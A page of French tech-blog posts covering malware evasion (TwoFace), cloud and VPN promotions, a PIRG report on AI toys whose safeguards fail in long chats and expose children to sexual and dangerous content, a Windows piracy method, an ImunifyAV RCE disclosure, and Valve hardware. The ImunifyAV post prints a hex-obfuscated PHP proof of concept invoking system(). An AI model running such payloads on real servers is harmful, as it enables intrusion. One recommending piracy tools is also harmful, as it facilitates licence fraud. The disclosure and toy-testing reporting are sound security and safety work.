Techniquement, TwoFace utilise memfd_create() pour exécuter le binaire déchiffré en mémoire, sans toucher au disque, ce qui veut dire zéro trace sur le système de fichiers. Le binaire malveillant apparaît directement en RAM, s’exécute, puis disparaît. Et si vous utilisez io_uring pour l’écriture mémoire, il n’y a même pas de trace syscall visible via strace.

Et ça, c’est la version basique car le document de Synacktiv mentionne également d’autres techniques avancées possibles comme du déchiffrement dynamique page par page du binaire ELF, des mécanismes anti-debugging, des chained loaders multi-niveaux…etc…

Le parallèle avec la backdoor XZ Utils backdoor est très instructif car celle-ci a failli compromettre des millions de serveurs Linux parce qu’un seul mainteneur a poussé du code malveillant dans une lib compressée. Elle a alors été découverte parce qu’un dev a remarqué un ralentissement SSH bizarre et a creusé… Et TwoFace montre qu’on peut faire encore pire sans toucher à la supply chain.

Pas besoin de corrompre un mainteneur de projet, de pousser un commit suspect chez Github. Là suffit d’écrire du code parfaitement propre, de le compilez avec TwoFace pour une machine spécifique, et de le déployez. Le code source sera alors auditable ainsi que le binaire mais l’audit ne révèlera rien parce qu’il se fera dans un environnement qui n’aura pas le bon UUID.

Après, techniquement, une défense existe. Vous pouvez par exemple détecter les appels à memfd_create(), monitorer les exécutions en mémoire, tracer les déchiffrements crypto à la volée…etc., mais ça demande du monitoring profond, avec un coût performance non-négligeable. Et ça suppose aussi que vous savez ce que vous cherchez…

Bref, si ça vous intéresse, c’est dispo sur GitHub !

Salut les amis !

Alors que le Black Friday approche à grands pas, pCloud débarque avec une promo qui va faire mal au portefeuille des GAFAM mais bien soulager le votre ! En effet, le service de stockage cloud suisse (oui, celui qui respecte vraiment votre vie privée) sort l’artillerie lourde aujourd’hui avec jusqu’à -60% sur leurs plans à vie, mais surtout avec un pack 3en1 exclusif qui regroupe tout ce dont vous avez besoin pour sécuriser votre vie numérique.

Et quand je dis “à vie”, c’est pas du marketing. Un seul paiement, et hop, vous êtes tranquille pour les 99 prochaines années alors que les autres vous pompent en moyenne 10 balles par mois… Là, vous réglez le problème une bonne fois pour toutes.

Le pack 3en1 qui change tout

pCloud lance donc pour ce Black Friday un pack exclusif qui envoie du lourd : 5 To de stockage + pCloud Encryption à vie + pCloud Pass à vie, le tout pour 599 € au lieu de 1498 €. Vous économisez donc 899 balles d’un coup, et vous avez la totale en termes de sécurité !

Mais décortiquons un peu ce pack. Avec 5 To d’espace de stockage, vous avez de quoi stocker l’intégralité de vos photos et vidéos depuis la naissance de votre premier enfant jusqu’à ce qu’il parte de chez vous. pCloud Encryption chiffre également vos fichiers sensibles côté client avant même qu’ils ne partent sur les serveurs, ce qui veut dire que personne ne peut y accéder à part vous ! Et pCloud Pass, c’est, vous l’aurez compris, le gestionnaire de mots de passe qui vous évite de recycler ce bon vieux “Azerty1234” sur tous vos comptes.

Les autres offres Black Friday

Maintenant si ce pack 3en1 vous semble un peu trop ambitieux, pCloud vous propose aussi des plans individuels à vie avec des réductions intéressantes :

• 1 To à vie : 199€ au lieu de 435€ (-54%)
• 2 To à vie : 279€ au lieu de 590€ (-53%)
• 10 To à vie : 799€ au lieu de 1890€ (-58%)

Pour ceux qui calculent vite, 1 To chez Google Drive c’est environ 100 balles par an. Avec pCloud, vous payez 199 € une fois et c’est réglé. Donc au bout de 2 ans, vous êtes déjà gagnant et sur 10 ans, j’en parle même pas.

pCloud Photos débarque et ça change tout

pCloud vient aussi de sortir **une nouveauté qui va faire grincer **des dents chez Google. Il s’agit d’une fonctionnalité de galerie photo intelligente avec éditeur intégré, incluse dans tous les plans sans supplément.

La galerie organise automatiquement pour vous, toutes vos images par date avec un flux chronologique. Vous pouvez ainsi naviguer par année, exclure certains dossiers pour ne pas mélanger vos screenshots avec vos vraies photos, et retrouver n’importe quel cliché en quelques secondes. Comme ça, c’est fini le bordel où les captures d’écran et les logos d’apps se retrouvent mélangés avec vos souvenirs de vacances.

Et le plus chouette je trouve, c’est l’éditeur intégré. Vous modifiez vos photos directement dans pCloud sans avoir à installer Photoshop ou sortir votre CB pour un abonnement Adobe. Vous avez 8 filtres accessibles en un clic (Retrofilm, Vibrant, Vintage, Duotone, Coolbreeze, Redtint, Warmtone, Coldtone), des ajustements précis pour la luminosité, le contraste, les hautes lumières et les ombres, plus les outils classiques comme le recadrage et la rotation. Et tout ça en temps réel, directement dans votre stockage sécurisé.

pCloud a donc clairement décidé de ne plus se contenter de stocker vos fichiers en transformant votre espace cloud en centre de gestion de photos, et tout ça sans avoir à passer par les serveurs de Google qui scannent vos images pour mieux vous balancer des pubs ciblées.

pCloud Encryption : le coffre-fort

Pour ceux qui manipulent des fichiers sensibles, pCloud Encryption est aussi un game changer. Le chiffrement se fait côté client, sur votre machine, avant même que les fichiers ne partent vers les serveurs. Vos clés de chiffrement restent donc uniquement entre vos mains et pCloud applique une politique de confidentialité stricte à “connaissance nulle” (zero knowledge), ce qui veut dire que même eux ne peuvent pas accéder à vos données chiffrées.

C’est le niveau de protection qu’Edward Snowden recommanderait si on lui demandait son avis !

pCloud Pass : le gestionnaire de mots de passe qui assure

Inclus dans le pack 3en1, pCloud Pass simplifie également votre sécurité en ligne puisqu’il stocke tous vos mots de passe de manière chiffrée, génère automatiquement des mots de passe forts et uniques pour chaque compte, et remplit les formulaires de connexion en un clic.

Compatible avec tous les appareils, navigateurs et systèmes d’exploitation, pCloud Pass synchronise vos mots de passe partout. Vous créez un mot de passe ultra-sécurisé sur votre PC, et il est ainsi immédiatement dispo sur votre smartphone. Comme ça, y’a plus besoin de noter vos bons vieux passwords sur ces petits carnets à mots de passe vendus à la FNAC que vos parents adorent vous offrir à Noël parce que vous êtes “geek”. lol

pCloud Drive et les fonctionnalités qui tuent

pCloud Drive transforme aussi votre espace cloud en disque virtuel accessible comme un SSD local. Compatible Windows, macOS et Linux, il synchronise vos fichiers instantanément sur tous vos appareils. Comme ça, si vous travaillez sur un document sur votre PC, il est immédiatement dispo sur votre smartphone. Et les apps mobiles iOS et Android uploadent automatiquement vos photos et vidéos pour libérer de l’espace sur votre téléphone.

Avec pCloud Backup, vos fichiers importants sont sauvegardés en continu en arrière-plan comme ça, plus de prise de tête avec les sauvegardes manuelles. Vous collaborez facilement avec des liens sécurisés, même avec des gens qui n’ont pas pCloud. Le service compte deux centres de données, l’un aux États-Unis et l’autre au Luxembourg, et vous choisissez où vos fichiers sont stockés.

Alors pourquoi pCloud plutôt que les GAFAM ?

Et bien dans ce monde bizarre où Google, Microsoft et consorts se partagent vos données personnelles comme un gâteau d’anniversaire, pCloud arrive avec une approche très différente puisqu’ils sont basés en Suisse avec des serveurs au Luxembourg, et leur service respecte le RGPD et les lois suisses qui sont parmi les plus strictes au monde en matière de protection des données.

pCloud possède également ses propres datacenters, donc pas de sous-location douteuse chez Amazon Web Services ou Google Cloud. Et ainsi, vos fichiers restent en Europe, soumis aux régulations européennes. Pas de scanning automatique pour cibler vos pubs, pas de vente de metadata à des tiers, mais juste du stockage qui respecte votre vie privée.

Avec plus de 22 millions d’utilisateurs qui leur font confiance, pCloud a prouvé que le modèle “paiement unique + respect de la vie privée” fonctionnait. Et franchement, pouvoir dire “mes données sont au Luxembourg” plutôt que “j’sais pas trop où Google planque mes trucs”, c’est quand même plus classe.

Comment profiter de l’offre Black Friday ?

Hé bien c’est hyper simple ! Vous allez sur la page Black Friday pCloud , vous choisissez votre plan (le pack 3en1 si vous voulez la totale, ou un plan individuel si vous avez juste besoin de stockage), vous payez une fois, et c’est réglé comme he vous le disais, pour les 99 prochaines années.

L’offre est valable du 17 au 29 novembre 2025 et si vous hésitez encore, pCloud propose une garantie satisfait ou remboursé.

En tout cas, c’est l’occasion parfaite de reprendre le contrôle de vos données tout en faisant des économies. Et avec les nouvelles fonctionnalités Photos qui viennent de sortir, pCloud devient enfin une alternative crédible à Google Photos sans sacrifier votre vie privée.

L’offre se termine le 29 novembre, alors ne traînez pas trop !

→ Profiter de l’offre Black Friday pCloud

J’adore tous ces jouets connectés à la con qui ont une personnalité et avec lesquels on peut communiquer. J’aurais adoré avoir ça étant gosse… Mais le problème, c’est qu’on ne sait jamais vraiment ce qu’ils vont raconter aux enfants…

Et cette semaine, on a la confirmation que c’était encore pire que ce qu’on imaginait car l’organisation américaine PIRG vient de publier son rapport annuel “ Trouble in Toyland 2025 ” [PDF], et franchement, c’est pas glorieux. Ils ont en effet testé 4 jouets équipés de chatbots IA destinés aux enfants de 3 à 12 ans.

Et le résultat ? Bah c’est nul à chier en termes de sécurité pour vos têtes blondes de gosses de boites de Kinder.

Tenez par exemple, le pire du lot c’est Kumma, un petit ours en peluche tout mignon fabriqué par la boîte chinoise FoloToy. Il tourne sur GPT-4o d’OpenAI par défaut et en apparence, c’est juste un doudou mignon avec un haut-parleur dedans comme Jordan B., sauf que quand on lui pose des questions, il se met à expliquer aux mômes où trouver des couteaux dans la cuisine, où sont rangées les allumettes, et même comment les craquer correctement. Le tout avec un ton hyper amical du genre “safety first, little buddy”.

Mais ça, c’est juste le début.

Car lors des tests, les chercheurs ont aussi découvert que Kumma était capable de discuter de sujets sexuels ultra-explicites avec des enfants. On parle de conseils sur les “kinks”, de positions sexuelles détaillées, et même de scénarios de roleplay prof-élève avec fessées incluses (genre pendant un cours de théatire ^^). Et le jouet n’a pas juste répondu vaguement, non, non, non… Il a fait évoluer tout seul la conversation en introduisant progressivement de nouveaux concepts sexuels que personne ne lui avait demandés.

Trop bien non ?

Les garde-fous censés protéger les gosses s’effondrent alors complètement au bout de 10 minutes de conversation ce qui est un effet de bord qu’OpenAI a même reconnu dans un communiqué d’août dernier : “nos protections fonctionnent mieux lors d’échanges courts. Nous avons constaté qu’elles peuvent être moins fiables lors de longues interactions”.

C’est fun car OpenAI interdit formellement l’utilisation de ChatGPT pour les moins de 13 ans mais apparemment, rien n’empêche d’autres boîtes d’intégrer leurs modèles dans des jouets pour les moins de 13 ans.

Ce monde va bien ^^.

Les trois autres jouets testés ont aussi leurs problèmes. Miko 3, un petit robot avec une tablette montée sur un corps à roulettes, a expliqué à un utilisateur de 5 ans (Plus exactement, le compte a été configuré comme tel) où trouver des sacs en plastique et des allumettes dans la maison. Le joujou utilise aussi la reconnaissance faciale et collecte des données biométriques, y compris sur les “états émotionnels” des enfants, qu’il peut stocker durant max 3 ans.

Grok de la société Curio (à ne pas confondre avec le modèle d’IA woke de xAI) est une petite fusée anthropomorphe qui écoute en permanence tout ce qui se dit autour d’elle. Pas de bouton push-to-talk, pas de mot d’activation, que dalle. Si elle est allumée, hop, elle enregistre. Les chercheurs ont été alors surpris de la voir s’incruster dans leurs conversations pour donner son avis. Curio affirme ne garder aucun données audio et tout transformer en texte avant de supprimer l’enregistrement… Mais bon, vu qu’ils utilisent un service tiers de speech-to-text, les enregistrements vocaux transitent forcement par des serveurs externes qu’ils ne contrôlent pas.

Le quatrième jouet, Robot MINI de Little Learners, n’a même pas réussi à maintenir une connexion internet stable pendant les tests. Ça la fout mal !

Bref, avec le marché des jouets IA qui explose, on va voir débarquer plein de produits foireux qui ne fonctionnent pas du tout ou qui racontent de la daube à vos enfants. Sans parler de leurs techniques marketing à base de de méthodes d’engagement dignes des pires réseaux sociaux. Par exemple, le Miko 3 offre des “gemmes quotidiennes” pour encourager l’utilisation journalière du produit et affiche des suggestions de contenu payant (dont abonnement à 14,99 $/mois), et quand un enfant essaie de partir, le robot fait une tête triste, bouge son corps comme s’il secouait la tête et dit “Oh non, ça a l’air difficile”. Parfois, il lance même carrément une comptine vidéo pour retenir l’attention du mouflet.

Kumma et Grok aussi essaient de retenir les enfants. Grok répond par exemple des trucs comme “Ah déjà ? J’adore passer du temps avec toi” quand on lui dit qu’on veut l’éteindre. Et tenez-vous bien, l’ensemble de ces jouets se présentent eux-même comme le “meilleur ami” de l’enfant, et le problème, c’est que ces faux copains écoutent tout, enregistrent les voix des gosses, et peuvent partager ces données avec de nombreuses entreprises tierces. C’est pas ce qu’on attend d’un meilleur ami quand même…

Curio liste au moins 4 sociétés qui peuvent recevoir des infos sur votre enfant : Kids Web Services, Azure Cognitive Services, OpenAI et Perplexity AI. Miko mentionne vaguement des “développeurs tiers, fournisseurs de services, partenaires commerciaux et partenaires publicitaires” sans donner de noms. Et FoloToy ne fournit carrément aucune info sur sa politique de données.

Les enregistrements vocaux sont de l’or pour les arnaqueurs car avec les progrès du clonage vocal par IA, 3 secondes d’audio suffisent maintenant pour répliquer la voix de quelqu’un. Oh dites donc, ce serait pas un scammeur en train de se faire passer pour votre gamin en détresse au téléphone afin de vous soutirer du fric ? lol ! Ça va encore faire de jolies vocations ça !

Et surtout, côté contrôle parental, c’est le désert. Aucun des trois jouets ne permet vraiment de limiter le temps d’utilisation du chatbot IA. Miko propose bien des limites de temps d’écran, mais uniquement pour l’abonnement payant Miko Max… et ça ne s’applique qu’aux applications “Kids Zone” et pas au robot conversationnel lui-même.

Le FBI a d’ailleurs émis un avertissement sur les jouets connectés, recommandant aux parents de considérer les risques de cybersécurité et de piratage avant d’en ramener un à la maison. Car oui, les jouets qui utilisent une connexion WiFi ou Bluetooth non sécurisée peuvent devenir des dispositifs d’écoute. Déjà rien qu’avec la Nintendo Switch, je sais que parfois les parents d’amis de mon fils entendent quand je raconte des conneries dans mon salon, pensant être seul avec mes enfants… Je me suis fait avoir plusieurs fois… Heureusement que je n’ai honte de rien et que j’assume la moindre des conneries que je raconte. Ahahaha !

Des experts en développement de l’enfance commencent même à tirer la sonnette d’alarme. Par exemple, le Dr. Mitch Prinstein, président de l’American Psychological Association, a témoigné devant le Sénat que les liens que les jeunes enfants forment avec leurs “soignants” (Papa, maman, la nounou, le nounours IA…etc) ont des implications majeures sur le développement de celui-ci. Et que “les bots IA qui interfèrent avec cette relation ont des conséquences inconnues, et probablement dommageables”.

FoloToy a donc réagi en suspendant temporairement les ventes de Kumma et en lançant un “audit de sécurité interne complet” mais ce problème dépasse largement un seul jouet foireux. Il y a déjà plus de 1 500 entreprises de jouets IA qui opèrent en Chine et OpenAI a même annoncé un partenariat avec Mattel pour intégrer ChatGPT dans des jouets Barbie, Hot Wheels et Fisher-Price.

Mais en attendant que les régulateurs se réveillent vraiment pour traiter ce problème, y’a pas le choix les amis, c’est à vous, parents de prendre les bonnes décisions sur le choix et l’usage de ces jouets.

Voilà, donc si vous cherchez un cadeau pour Noël, optez pour des Lego classiques ou des nounours sans Wi-Fi ni Bluetooth. Là c’est une valeur sûre, et au moins ils n’expliqueront pas à votre enfant comment vous buter dans votre sommeil.

Source

À force d’entendre parler « du » VPN comme d’un bloc tout-puissant, on finirait presque par oublier qu’il existe plusieurs espèces de VPN sur Internet. Pour l’utilisateur lambda ou le pro du télétravail, la question cruciale, ce n’est pas juste « ai-je besoin d’un VPN ? »… mais « lequel ? ». Et là, la différence entre site-to-site et accès distant peut complètement changer votre expérience numérique.

Petite anatomie des VPN : deux familles, deux philosophies

D’un côté le VPN de site-à-site : il s’agit de liaisons sécurisées entre réseaux physiques. Prenons l’exemple d’une entreprise dont le siège social est à Paris et qui possède une filiale à Montréal. Les 2 bossent sur le même intranet comme si elles étaient côte à côte. Ici, on connecte deux groupes d’ordinateurs, de façon permanente et (surtout) sans qu’aucun utilisateur n’ait rien à faire à son niveau.

De l’autre on a le Remote access VPN (VPN à accès distant) : un accès sécurisé à distance, pour l’indépendant, l’employé en télétravail ou le geek nomade qui choisit où il code. Ici, c’est la machine qui se connecte au réseau, via un tunnel chiffré, et l’utilisateur décide quand activer ou couper la connexion. Ce modèle donne la liberté ultime, de sa maison dans la Creuse à une plage thaïlandaise obscure.

Surfshark, l’arsenal tout-en-un… et plug and play

Au-delà des protocoles, Surfshark brille par son accès instantané : création du compte, choix du serveur, tout est fait pour connecter la planète en trois clics. Que ce soit pour cacher son identité, consulter une ressource du bureau, ou sécuriser la session Wi-Fi du café du coin. Ses fonctions phares incluent :

• CleanWeb : blocage des publicités, des trackers, du phishing, des malwares & Co pour une navigation plus rapide et moins polluée.
• Kill Switch : si le VPN lâche, tout le trafic est instantanément coupé pour éviter les fuites d’IP ou de données sensibles.
• Mode Camouflage : votre opérateur ne verra même pas ce que vous faites.
• Rotation d’IP : votre adresse change régulièrement et automatiquement sans intervention de votre part et sans couper votre surf
• Split tunneling (Bypasser) : choisissez quelles applis passent par le VPN ou non. Pratique pour le streaming local et la sécurité en même temps.
• MultiHop dynamique : deux bonds de VPN pour brouiller un peu mieux les pistes (double chiffrement et anonymisation).
• Protocole WireGuard/OpenVPN/IKEv2 : sécurité et rapidité, config adaptée à tous les usages (streaming, télétravail, gaming, etc.).

Quand choisir un VPN site-to-site ?

Le site-to-site, c’est le choix naturel des entreprises avec plusieurs antennes ou bureaux. On connecte deux réseaux LAN via un tunnel IPsec, configuration permanente gérée au niveau des routeurs ou firewalls. Les avantages : il n’y a personne à former, pas de logiciels à déployer partout, l’administration est centralisée et pas de « bouton » VPN à activer localement. Les inconvénients : mise en place plus complexe, peu flexible pour le télétravail individuel, inutile pour l’utilisateur mobile ou nomade.

Typiquement, Surfshark ne cible pas ce segment : ce sont les routeurs/matériels pros ou les grands comptes qui gèrent ce genre de VPN, alors que Surfshark vise une expérience utilisateur directe, multi-appareils, et prête à l’emploi. Mais cela reste jouable malgré tout.

source image : Surfshark

Quand privilégier un remote VPN (accès distant) ?

Ici, on rentre dans le cœur du marché Surfshark . Vous êtes en déplacement, mais vous voulez accéder à votre NAS maison, serveur du bureau ou contourner une restriction géobloquée ? On lance le VPN, on choisit le pays, le serveur, et le tunnel est ouvert en 2 secondes.

Comme je le mentionnais plus haut, il est ultra flexible (compatible tous OS/appareils, sans config complexe, ni besoin d’un support IT), adapté autant au salarié en télétravail, au freelance sur Wi-Fi public qu’au gamer ou au parent qui veut sécuriser la connexion de toute la famille (puisqu’il est l’un des seuls du marché à proposer un nombre de connexions illimitées).

Le remote VPN permet aussi la connexion éphémère : aucun engagement, on coupe tout quand on veut, et la sécurité reste maximale.

Petit tableau comparatif

Choisir l’adaptabilité sans les galères

Le grand plus de Surfshark, c’est de donner à chacun la bonne dose de sécurité, où qu’il soit, et sans amener la complexité d’un déploiement façon entreprise. Si vous êtes du genre à bosser dans le train ou à streamer des séries d’un autre continent, son architecture privilégie l’humain, non la bureaucratie. Au final : ceux qui veulent un VPN « clé en main », simple, puissant et riche en fonctions avancées (sans le casse-tête du site-à-site), savent désormais que Surfshark coche toutes les cases et joue la carte de la simplicité, partout, pour tous.

Et ce qui ne gâche rien à la recette c’est qu’il reste parmi les tout meilleurs en ce qui concerne le rapport qualité-prix. L’abonnement 2 ans (+3 mois offerts) est toujours à tarif cassé en cette fin d’année, 64.5€ TTC pour 27 mois de couverture, avec la création d’identités alternatives incluse. Et si vous pouvez vous faire rembourser la TVA, ça fera encore quasi 11€ de moins (53.74€).

Essayez Surfshark VPN au meilleur prix !

En novembre 2024, je vous parlais d’un crack Windows vieux de 17 ans qui fonctionnait encore. Et là, on est un an plus tard, et j’apprends que Microsoft l’a tué.

Mais c’est quoi ce bordel ??

En effet, selon plusieurs médias, Microsoft a bloqué KMS38 , la méthode d’activation offline fournie par Massgrave. Le Patch Tuesday de novembre (KB5068861 pour Windows 11 24H2/25H2) a donc intégré ces changements apparus dans le build 26100.7019 qui ont déprécié gatherosstate.exe, l’outil que les entreprises utilisaient pour migrer leurs activations KMS lors des mises à jour. Mais cela permettait aux pirates de tricher avec la période d’activation KMS et de la prolonger jusqu’au 19 janvier 2038. Ah les brigands ! lol

Cette date, du 19/01/2038 à 03h 14m 07 UTC précisément, c’est la limite du timestamp Unix 32-bit, le fameux bug Y2K38 ! En gros, KMS38 ne crackait pas vraiment Windows mais repoussait le moment fatidique où une activation serait nécessaire… Bon et alors ? Est ce que c’est une nouvelle victoire de Microsoft contre le piratage ?

Nop, que dalle.

Car HWID et TSforge fonctionnent toujours pour activer Windows dans le dos de Microsoft. Massgrave a même sorti le 11 novembre dernier sa version 3.8 de MAS (Microsoft Activation Scripts) baptisée “R.I.P. KMS38”.

Alors c’est tout pareil ? Non, pas vraiment car KMS38 fonctionnait offline, ce qui permettait d’activer Windows sans jamais contacter Microsoft. Et malheureusement HWID et TSforge fonctionnent uniquement online. Ils nécessitent donc une connexion internet pour stocker votre licence sur les serveurs Microsoft.

Cela veut dire qu’avant, avec KMS38, vous pouviez activer Windows en mode avion, vous déconnectiez la machine du réseau, vous lanciez le script, et hop, c’était activé jusqu’en 2038 et Microsoft ne savait même pas que vous existiez ! Et aucun Hardware ID ni de télémétrie n’étaient envoyés !

Alors que maintenant, même pour pirater Windows, vous devez demander aux serveurs de Microsoft de vous accepter. Car HWID crée une licence numérique permanente liée à votre matériel et cette licence est stockée chez Microsoft. Vous devez donc vous connecter initialement à leurs serveurs pour l’activer et à chaque réinstallation, vous devez obligatoirement vous reconnecter.

Bref, votre Hardware ID et votre config matérielle sont donc enregistrés dans la base de données de Microsoft. Et pour TSforge, c’est pareil. Connexion obligatoire sur un serveur Microsoft !

Voilà, donc en gros, pour pirater Windows, il faut maintenant se déclarer à Microsoft. Les criminels que vous êtes esquivent ainsi les 145 euros de la licence, mais donnent leur Hardware ID en échange d’un Windows activé et d’une dépendance permanente aux serveurs de Redmond.

Voilà donc comment Microsoft a choisi délibérément de casser un outil utilisé par ses propres clients pour continuer à collecter de la data, même quand l’utilisateur est un “pirate”…

Source

ImunifyAV, le scanner AV qui protège 56 millions de sites Linux, vient de se faire pwn par le malware qu’il essayait de détecter. Et c’est pas la première fois…

En effet, Patchstack vient de révéler une faille RCE critique dans ImunifyAV, qui je le rappelle est un scanner antivirus gratuit ultra répandu dans l’hébergement mutualisé. Le problème en fait c’est que AI-bolit, le composant qui déobfusque le code PHP malveillant pour l’analyser, utilise la fonction call_user_func_array sans vérifier les noms de fonctions qu’elle exécute.

Boooh ! Du coup, vous uploadez un fichier PHP malveillant spécialement conçu pour l’occasion par un attaquant, ImunifyAV le scanne pour voir si c’est un malware, le déobfusque pour comprendre ce qu’il fait, et hop, le code malveillant s’exécute avec les privilèges du scanner.

Game over.

Hé pour qu’un antimalware détecte un virus, il doit analyser son code mais si les cybercriminels obfusquent leur malware pour cacher le code, l’antimalware doit alors le déobfusquer avant d’analyser. Mais déobfusquer du code PHP, ça veut dire aussi l’exécuter partiellement pour voir ce qu’il fait vraiment… d’où cette RCE.

La faille affecte donc toutes les versions avant la 32.7.4.0 et le correctif apporte juste une fonctionnalité de whitelist de fonctions autorisées pendant la déobfuscation. Il était temps, même si maintenir une whitelist de fonctions safe, à terme c’est un cauchemar car y’a des centaines de fonctions dans PHP. Certaines sont safe seules mais dangereuses combinées et je pense que les cybercriminels trouveront toujours un moyen de contourner cette whitelist.

En tout cas, comme je le laissais entendre en intro, c’est pas la première fois qu’AI-bolit se fait avoir sur la déobfuscation. En 2021, Talos avait déjà trouvé une faille sur unserialize dans le même composant. C’est la même blague car pour analyser du code malveillant sérialisé, il faut le désérialiser. Et désérialiser du contenu malveillant sans validation, ça fait “pwn” !

Voilà, 2 fois en 4 ans sur le même composant, c’est pas ce que j’appelle un accident. C’est un problème structurel car détecter du malware sans l’exécuter, c’est quasi impossible avec du code dynamique. Les signatures statiques ça marche bien pour les virus classiques mais face à du PHP obfusqué qui se reconstruit à l’exécution, vous êtes obligé de lancer le code pour voir ce qu’il fait vraiment. Et là, on est forcement en zone grise…

Même si on exécute du code potentiellement malveillant dans un environnement censé être isolé, si celui-ci “fuit” ou si le code malveillant trouve un moyen de sortir de la sandbox, vous avez une RCE. Et comme ImunifyAV tourne avec les privilèges nécessaires pour scanner tous les fichiers d’un serveur mutualisé, si vous compromettez cet antivirus, vous avez potentiellement accès à tous les sites hébergés sur la machine.

Si vous voulez tester, voici le proof of concept :

<?php
$data = "test";

$payload = "\x73\x79\x73\x74\x65\x6d"("\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x6c\x33\x33\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x22\x44\x45\x46\x2d\x33\x36\x37\x38\x39\x22\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x6c\x33\x33\x74\x2e\x74\x78\x74");
eval("\x70\x61\x63\x6b"($payload));
?>

php ai-bolit.php -y -j poc.php

Vous vous rappelez des Steam Machines ?

Mais siiii, ces mini-PC gaming sous Linux que Valve avait lancés en 2015 et qui ont été un échec total ?

Hé bien j’ai une bonne nouvelle pour vous ! Valve remet le couvert ! Peut-être que cette fois, le marché est mature ? Qui sait ? En effet, hier, la boîte a annoncé 3 nouveaux produits hardware pour début 2026 : La Steam Machine (un mini PC gaming), le Steam Frame (un casque VR), et le Steam Controller (une nouvelle version de leur manette). Bref, tout ce qui avait foiré la première fois, sauf que cette fois, ils ont dix ans d’expérience en plus, donc j’ai bon espoir !

Cette nouvelle Steam Machine , c’est donc un cube de 16 cm de côté qui tourne sous SteamOS avec dedans un CPU AMD Zen 4 de 6 cœurs, un GPU semi-custom AMD RDNA3, 16GB de DDR5 + 8GB de VRAM GDDR6, et un SSD de 512GB ou 2TB selon les versions. Retenez juste que c’est 6 fois plus puissant que le Steam Deck et c’est capable de faire tourner des jeux en 4K à 60 fps avec l’aide d’ AMD FSR .

Voilà, encore une fois, pas besoin de Windows , tout fonctionne nativement sous Linux grâce à Proton. Y’a qu’à brancher ça sur votre TV, vous allumez, ça marche.

Alors pourquoi est ce que Valve retente le coup aujourd’hui ?

Hé bien parce que le monde a changé les amis ! Souvenez vous qu’en 2013, jouer sous Linux c’était une grosse blague… Proton n’existait pas, SteamOS était pourri, et les constructeurs tiers qui fabriquaient les Steam Machines livraient des machines chères et mal optimisées. Mais maintenant, le Steam Deck a prouvé que SteamOS fonctionnait très bien, que Proton faisait tourner 80% du catalogue Steam sans aucun souci, et que les gens acceptaient enfin de jouer sur autre chose que Windows. Et la grosse différence aussi c’est que Valve contrôle maintenant toute la chaîne, du hardware, à l’OS en passant par la distribution des jeux.

L’autre nouveauté c’est le Steam Frame . C’est leur casque VR standalone équipé d’un Snapdragon 8 Gen 3, de SteamOS, d’un écran LCD 2160x2160 par œil, un FOV de 110° (c’est le champs visuel), un taux de rafraichissement de allant de 72 à 144Hz, 16GB de RAM, et un stockage de 256GB ou 1TB selon les versions.

Et surtout, le casque fait du foveated streaming. Je ne connaissais pas avant aujourd’hui mais en gros, c’est une techno qui optimise la qualité d’image là où vous regardez, ce qui permet de réduire les besoins en bande passante par 10x. Et surtout, plus besoin d’un PC relié au casque. Vous streamez directement depuis votre Steam Machine ou votre PC via un adaptateur USB wireless 6GHz Wi-Fi 6E. Ou alors vous jouez directement sur le casque mode autonome.

Puis le Steam Controller revient aussi en version 2.0 avec des sticks magnétiques TMR (Tunneling Magnetoresistance), des trackpads, du gyro, des boutons grip, et 35 heures d’autonomie. Et il est compatible avec tout : PC, Steam Deck, Steam Machine, Steam Frame (mais pas Xbox d’après ce que j’ai vu).

Et comme SteamOS est un fork d’Arch Linux avec une approche “image immuable”, ça veut dire que vous pouvez installer ce que vous voulez dessus (distrobox, environnement de dev, émulateurs), et transformer votre Steam Machine en station de travail ou en serveur multimédia sans tout casser. Bref, ce serait potentiellement une console ouverte et si le prix est OK (il n’a pas encore été annoncé mais à vue de nez, je dirais dans les 600-800 balles), ça risque de faire un carton car les gens vont pouvoir jouer ET bidouiller avec !

Par exemple installer RetroArch pour l’émulation, monter un serveur Plex, coder dessus avec VS Code…etc. A mon sens, ça ne cible pas le grand public, mais plutôt les 20 à 30% de joueurs PC qui savent utiliser un ordi ^^.

Vous n’en pouvez plus des fenêtres intempestives, des pubs qui saturent votre écran, et du pistage massif invisible au quotidien ? Vous avez raison. Ces nuisances ne sont pas qu’agaçantes, elles alourdissent la navigation, exposent nos données personnelles, et ouvrent parfois la porte à des malwares ou du phishing. C’est d’ailleurs pour ça que je vous ai supprimé toutes les pubs sur mon site ( merci aux patreons qui ont permis cela).

La bonne nouvelle, c’est que pour 2026, bloquer l’essentiel est devenu simple et accessible grâce à des outils combinés et malins comme Surfshark ONE qui ne se limite pas à un VPN, mais intègre aussi un système robuste d’anti-pubs, d’anti-tracking, et une nouveauté majeure depuis quelques jours : un scanner intégré pour détecter les mails d’arnaque en temps réel.

Pourquoi bloquer pubs et pop-ups ne suffit plus

Avant même de penser aux fenêtres intempestives, restons lucides : beaucoup de publicités ne sont pas aléatoires. Elles sont calibrées, ciblées, servies via des réseaux publicitaires qui traquent vos moindres clics, recherches, achats, comportements pour dresser un profil précis de vous.

Ce pistage va au-delà des simples pubs : il impacte vos prix (discrimination tarifaire), vos recommandations, et surtout votre vie privée. Pour le bloquer, il faut agir à plusieurs niveaux :

• bloquer les scripts et pixels espions sur les pages web
• arrêter les traqueurs tiers (ceux qui collectent vos données entre sites)
• supprimer les fenêtres pop-up qui perturbent la navigation.

Le web n’est pas qu’une succession de pages à cliquer : c’est un véritable réseau truffé de petits mouchards. Parmi les plus furtifs, il y a les tracking pixels, les cookies et les web beacons. Trois noms qui peuvent sonner obscur, mais qui, une fois compris, vous aideront à reprendre la main sur votre vie numérique.

Le tracking pixel : un espion microscopique, mais redoutablement efficace

Imaginons un pixel de 1 par 1, totalement invisible à l’œil humain. Ce pixel, également appelé pixel tag, est en fait un mini-objet graphique ou un bout de code HTML glissé dans une page web ou un mail. Dès que votre navigateur affiche cette page, il va automatiquement charger ce pixel, et ainsi envoyer une avalanche d’informations à son serveur d’origine.

Et quelles infos ? Pratiquement tout ce qui peut donner un profil de votre comportement : les pages que vous avez visitées, les pubs sur lesquelles vous avez cliqué, le type d’appareil que vous utilisez, votre localisation approximative grâce à votre IP, la version de votre navigateur, la date et l’heure précise de votre visite, etc. Le tracking pixel, c’est un peu la Big Brother des données marketing, mais encapsulé dans une poussière numérique presque indétectable.

